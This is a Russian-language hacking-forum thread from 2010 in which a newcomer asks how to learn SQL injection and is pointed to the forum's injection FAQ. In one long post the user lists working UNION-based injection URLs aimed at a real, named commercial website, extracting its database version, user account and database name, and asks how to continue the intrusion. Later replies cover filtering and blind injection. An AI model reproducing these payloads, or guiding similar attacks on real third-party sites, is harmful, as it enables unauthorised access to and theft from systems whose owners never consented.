Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

09.01.2010, 09:25
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме: 5011696
Репутация:
2221
|
|
Просто в гугл вбей phpBB sql injection vuln
|
|
|

09.01.2010, 17:25
|
|
Новичок
Регистрация: 14.05.2008
Сообщений: 11
Провел на форуме: 90456
Репутация:
0
|
|
Сообщение от Ctacok
Просто в гугл вбей phpBB sql injection vuln
Спасибо что не послали. Поиск в гугле phpBB sql injection vuln особых результатов не дал. Все в основном на английском. Да даже и на русском то по большей части просто большие куски кода на php практически без объяснения (типа раз таким интересуешься то и так все поймешь а если не шаришь то это и к лучшему: а то понаучиваются всякие придурки инъекции проводить потом ни одного форума целого не останется). Это и понятно лет 5-7 назад инъекции проводить было гораздо легче, фильтрации данных особо не проводили и зная основы php и sql можно было прописать что-небудь типа http://forum.ru/index.php?id=-1+union+select+1,2,3,4,5,6,7,8+from+INFORMATION_SC HEMA.TABLES/*. З годами создатели всяческих phpBB совершенствовали свои творения и желающие взломать их совершенствовали свои методы. И к теперешнему времени досовершенствовались до того что новичку уже знаний основ php и sql мало. А желающих обучать малоспособных учеников особо нет.
|
|
|

09.01.2010, 18:09
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме: 5011696
Репутация:
2221
|
|
Сообщение от 2640750
Спасибо что не послали. Поиск в гугле phpBB sql injection vuln особых результатов не дал. Все в основном на английском. Да даже и на русском то по большей части просто большие куски кода на php практически без объяснения (типа раз таким интересуешься то и так все поймешь а если не шаришь то это и к лучшему: а то понаучиваются всякие придурки инъекции проводить потом ни одного форума целого не останется). Это и понятно лет 5-7 назад инъекции проводить было гораздо легче, фильтрации данных особо не проводили и зная основы php и sql можно было прописать что-небудь типа http://forum.ru/index.php?id=-1+union+select+1,2,3,4,5,6,7,8+from+INFORMATION_SC HEMA.TABLES/*. З годами создатели всяческих phpBB совершенствовали свои творения и желающие взломать их совершенствовали свои методы. И к теперешнему времени досовершенствовались до того что новичку уже знаний основ php и sql мало. А желающих обучать малоспособных учеников особо нет.
Насчёт 5-7 лет ты ошибаешься 
INFORMATION_SCHEMA, только в Mysql5, а Mysql5 вышел не 5-7 лет назад  (Примерную дату даже незнаю  )
И тем более 5-7 лет назад небыло таких методов как сейчас, сейчас очень хорошо всё развиваеться в области ИТ безопасности.
Насчёт English, если появляеться на Английских коммунити какие либо уязвимости, то они быстро оказываються на просторах рухека.
к теперешнему времени досовершенствовались до того что новичку уже знаний основ php и sql мало.
Ошибайтесь, 5 лет назад про SQL injection, было очень мало контента, сейчас же на любом коммунити.
Ну да, соглашусь, методов безопасности стало куда больше.
|
|
|

09.01.2010, 19:11
|
|
Новичок
Регистрация: 14.05.2008
Сообщений: 11
Провел на форуме: 90456
Репутация:
0
|
|
Сообщение от Ctacok
И тем более 5-7 лет назад небыло таких методов как сейчас, сейчас очень хорошо всё развиваеться в области ИТ безопасности..
Сообщение от Ctacok
Ошибайтесь, 5 лет назад про SQL injection, было очень мало контента, сейчас же на любом коммунити.
Это конечно все правильно спорить не стану но вот для новичков никаких статей или FAQ по которых можно было осваивать на практике инъекции на современных ресурсах я найти не смог. Остается только разве что устанавливать "Denwer" и на localhost-те который ничего не фильтрует практиковать инъекции.
Ладно пойду погуглю часок другой может что-небудь и найду достаточно разжеванное для моего уровня познаний
P.S.: надеюсь я еще не надоел со своими философствованиями
|
|
|

09.01.2010, 19:14
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме: 5011696
Репутация:
2221
|
|
Сообщение от 2640750
Это конечно все правильно спорить не стану но вот для новичков никаких статей или FAQ по которых можно было осваивать на практике инъекции на современных ресурсах я найти не смог. Остается только разве что устанавливать "Denwer" и на localhost-те который ничего не фильтрует практиковать инъекции.
Ладно пойду погуглю часок другой может что-небудь и найду достаточно разжеванное для моего уровня познаний
P.S.: надеюсь я еще не надоел со своими философствованиями
https://forum.antichat.ru/threadedpost1814768.html#post1814768
Как бэ здесь около 11к постов с SQL Injection, бери любой да копай. 
Мы сейчас общаемся в теме с отличным FAQ'ом по скулям.
|
|
|

09.01.2010, 20:29
|
|
Новичок
Регистрация: 14.05.2008
Сообщений: 11
Провел на форуме: 90456
Репутация:
0
|
|
Сообщение от Ctacok
https://forum.antichat.ru/threadedpost1814768.html#post1814768
Как бэ здесь около 11к постов с SQL Injection, бери любой да копай. 
Мы сейчас общаемся в теме с отличным FAQ'ом по скулям.
ничего себе. еще никогда не видел чтоб на одну тему приходилось столько страниц. тут же месяцами читать не перечитать
|
|
|

10.01.2010, 00:26
|
|
Новичок
Регистрация: 14.05.2008
Сообщений: 11
Провел на форуме: 90456
Репутация:
0
|
|
Спасибо за ссылку на список форумов. Но я все же решил воспользоваться твоей добротой и задать несколько (скорее всего глупых) вопросов. Но сначала мои достижения:
На https://forum.antichat.ru/threadnav21336-1141-10.html в посте #11404 пишется об http://www.glassdecor.ru
http://www.glassdecor.ru/articles/show.php?id=11+order+by+2-- узнал что поля 2
http://www.glassdecor.ru/articles/show.php?id=-11+union+select+1,2-- узнал что выводится второе из них.
http://www.glassdecor.ru/articles/show.php?id=11+and+1=0+union+select+1,concat_ws(0x 3a,version(),user(),database())-- узнал об версти- 5.0.67, имени пользователи -glassdecorru@78.108.81.71 и имени БД - glassdecorru_db.
На сколько я понимаю функция concat_ws() используется для того чтобы объединить в виде одного параметра (не знаю как это точнее назвать) сразу три функции: version() , user(), database().
А теперь глупые вопросы:
1) http://www.glassdecor.ru/articles/show.php?id=-11+union+select+1,2+from+INFORMATION_SCHEMA.TABLES-- оказался алогичным к
http://www.glassdecor.ru/articles/show.php?id=-11+union+select+1,2-- INFORMATION_SCHEMA.TABLES появилась в 5-ой версии а у нас 5.0.67. значит она должна быть. Где я ступил?
2) http://www.glassdecor.ru/articles/show.php?id=-11+union+select+1,2/* почему-то приводит к ошибке. Значит ли это что «/» фильтруется? На сколько я понимаю нет. Потому что http://www.glassdecor.ru/articles/show.php?id=-11/**/union/**/+select/**/+1,2-- срабатывает как надо. А вот почему срабатывает комментарий «--», а при «/*» - ошибка я так и не понял?
3) Первый параметр concat_ws() – «0x3a» это имеется ввиду символ двоеточия «:» Но почему эго надо прописывать кодом а если просто прописать http://www.glassdecor.ru/articles/show.php?id=11+and+1=0+union+select+1,concat_ws(:, version(),user(),database())-- то приводит к ошибке. Значит ли это что символ двоеточия «:» фильтруется.
4) Что можно делать дальше если использование INFORMATION_SCHEMA.TABLES ни к чему полезному не приводит ?
P.S.: Что-то мои посты с каждым разом все длиннее и длиннее. Ctacok надеюсь я тебя ими еще не задолбал. Очень уж хочется освоить эту тему.
Последний раз редактировалось 2640750; 10.01.2010 в 00:40..
|
|
|

21.01.2010, 14:43
|
|
Новичок
Регистрация: 24.01.2009
Сообщений: 13
Провел на форуме: 156717
Репутация:
0
|
|
Сорри за нубский вопрос.когда я проверяю на уязвимости методом подставления кавычек и всего остального,выкидывает на главную.это как понимать?
|
|
|

21.01.2010, 14:47
|
|
Участник форума
Регистрация: 25.10.2008
Сообщений: 215
Провел на форуме: 2483773
Репутация:
78
|
|
Значит нет уязвимости, все норм фильтруется.
|
|
|

21.01.2010, 15:01
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме: 10605912
Репутация:
4693
|
|
Сообщение от $Atlet$
Значит нет уязвимости, все норм фильтруется.
Не факт, может и блайнд, который при ошибке запроса кидает на главную
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|